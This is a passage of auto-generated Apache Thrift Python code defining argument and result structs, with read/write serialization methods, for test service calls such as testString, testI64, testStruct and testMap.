return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testVoid_args)
testVoid_args.thrift_spec = (
)
class testVoid_result(object):
__slots__ = (
)
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testVoid_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testVoid_result)
testVoid_result.thrift_spec = (
)
class testString_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.thing = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testString_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.STRING, 1)
oprot.writeString(self.thing.encode('utf-8') if sys.version_info[0] == 2 else self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testString_args)
testString_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'thing', 'UTF8', None, ), # 1
)
class testString_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testString_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success.encode('utf-8') if sys.version_info[0] == 2 else self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testString_result)
testString_result.thrift_spec = (
(0, TType.STRING, 'success', 'UTF8', None, ), # 0
)
class testBool_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BOOL:
self.thing = iprot.readBool()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testBool_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.BOOL, 1)
oprot.writeBool(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testBool_args)
testBool_args.thrift_spec = (
None, # 0
(1, TType.BOOL, 'thing', None, None, ), # 1
)
class testBool_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testBool_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testBool_result)
testBool_result.thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
)
class testByte_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BYTE:
self.thing = iprot.readByte()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testByte_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.BYTE, 1)
oprot.writeByte(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testByte_args)
testByte_args.thrift_spec = (
None, # 0
(1, TType.BYTE, 'thing', None, None, ), # 1
)
class testByte_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BYTE:
self.success = iprot.readByte()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testByte_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BYTE, 0)
oprot.writeByte(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testByte_result)
testByte_result.thrift_spec = (
(0, TType.BYTE, 'success', None, None, ), # 0
)
class testI32_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.thing = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testI32_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.I32, 1)
oprot.writeI32(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testI32_args)
testI32_args.thrift_spec = (
None, # 0
(1, TType.I32, 'thing', None, None, ), # 1
)
class testI32_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testI32_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testI32_result)
testI32_result.thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
)
class testI64_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.thing = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testI64_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.I64, 1)
oprot.writeI64(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testI64_args)
testI64_args.thrift_spec = (
None, # 0
(1, TType.I64, 'thing', None, None, ), # 1
)
class testI64_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I64:
self.success = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testI64_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I64, 0)
oprot.writeI64(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testI64_result)
testI64_result.thrift_spec = (
(0, TType.I64, 'success', None, None, ), # 0
)
class testDouble_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.DOUBLE:
self.thing = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testDouble_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.DOUBLE, 1)
oprot.writeDouble(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testDouble_args)
testDouble_args.thrift_spec = (
None, # 0
(1, TType.DOUBLE, 'thing', None, None, ), # 1
)
class testDouble_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.DOUBLE:
self.success = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testDouble_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.DOUBLE, 0)
oprot.writeDouble(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testDouble_result)
testDouble_result.thrift_spec = (
(0, TType.DOUBLE, 'success', None, None, ), # 0
)
class testBinary_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.thing = iprot.readBinary()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testBinary_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.STRING, 1)
oprot.writeBinary(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testBinary_args)
testBinary_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'thing', 'BINARY', None, ), # 1
)
class testBinary_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readBinary()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testBinary_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeBinary(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testBinary_result)
testBinary_result.thrift_spec = (
(0, TType.STRING, 'success', 'BINARY', None, ), # 0
)
class testStruct_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.thing = Xtruct()
self.thing.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testStruct_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.STRUCT, 1)
self.thing.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testStruct_args)
testStruct_args.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'thing', [Xtruct, None], None, ), # 1
)
class testStruct_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = Xtruct()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testStruct_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testStruct_result)
testStruct_result.thrift_spec = (
(0, TType.STRUCT, 'success', [Xtruct, None], None, ), # 0
)
class testNest_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.thing = Xtruct2()
self.thing.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testNest_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.STRUCT, 1)
self.thing.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testNest_args)
testNest_args.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'thing', [Xtruct2, None], None, ), # 1
)
class testNest_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = Xtruct2()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testNest_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testNest_result)
testNest_result.thrift_spec = (
(0, TType.STRUCT, 'success', [Xtruct2, None], None, ), # 0
)
class testMap_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.MAP:
self.thing = {}
(_ktype264, _vtype265, _size263) = iprot.readMapBegin()
for _i267 in range(_size263):
_key268 = iprot.readI32()
_val269 = iprot.readI32()
self.thing[_key268] = _val269
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMap_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.MAP, 1)
oprot.writeMapBegin(TType.I32, TType.I32, len(self.thing))
for kiter270, viter271 in self.thing.items():
oprot.writeI32(kiter270)
oprot.writeI32(viter271)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
